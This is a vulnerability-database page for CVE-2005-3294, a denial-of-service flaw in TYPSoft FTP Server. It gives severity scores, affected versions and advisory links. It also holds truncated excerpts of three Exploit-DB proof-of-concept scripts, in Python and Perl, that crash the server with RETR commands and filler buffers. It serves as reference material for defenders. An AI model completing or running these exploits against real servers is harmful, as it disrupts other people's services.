CVE-2005-3294
published 2005-10-23
Priority P4 23 | medium 5 | CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 7.68% (93.8th percentile)
Typsoft FTP Server 1.11, with "Sub Directory Include" enabled, allows remote attackers to cause a denial of service (crash) by sending multiple RETR commands. NOTE: it was later reported that 1.10 is also affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| typsoft | typsoft_ftp_server | <= 1.11 | — |
No detection rules found.
Exploit-DB
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
exploitdb·2010-12-29·CVSS 5.0
CVE-2005-3294 [MEDIUM] TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
---
```python
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili
#
# Notes:
# I have written this exploit because the code published here (1) does not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#
import socket
import sys
user="test"
pwd="test"
buffer="\x41"
print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffe
```
Exploit-DB
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)
exploitdb·2010-05-14
CVE-2005-3294 TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)
---
```python
# Tested on: Windows XP, SP2 (EN)
#!/usr/bin/python
print "\n#################################################################"
print "## RedTeam Security ##"
print "## TYPSoft FTP Server RETR Command DoS ##"
print "## Version 1.10 ##"
print "## ##"
print "## Jeremiah Talamantes ##"
print "## [email protected] ##"
print "################################################################# \n"
import socket
import sys
# Description:
# RETR command overflow with no PORT specified
# Define the exploit's usage
def Usage():
    print ("Usage: scriptname.py \n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security : www.redteamsecure.com/labs\n")
# Buffer
buffer="AAAA" * 496
def exploit(hostname,username,password):
i=
```
Exploit-DB
TYPSoft FTP Server 1.11 - 'RETR' Denial of Service
exploitdb·2005-10-14
CVE-2005-3294 TYPSoft FTP Server 1.11 - 'RETR' Denial of Service
---
```perl
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "\n-= TYPSoft FTP Server 3) { die "usage: perl typsoft-1.11-DOS.pl [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";
print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and pri
```
No writeups or analysis indexed.
http://secunia.com/advisories/17196
http://www.exploit-db.com/exploits/15860
http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
http://www.osvdb.org/19992
http://www.securityfocus.com/bid/15104
2005-10-23
Published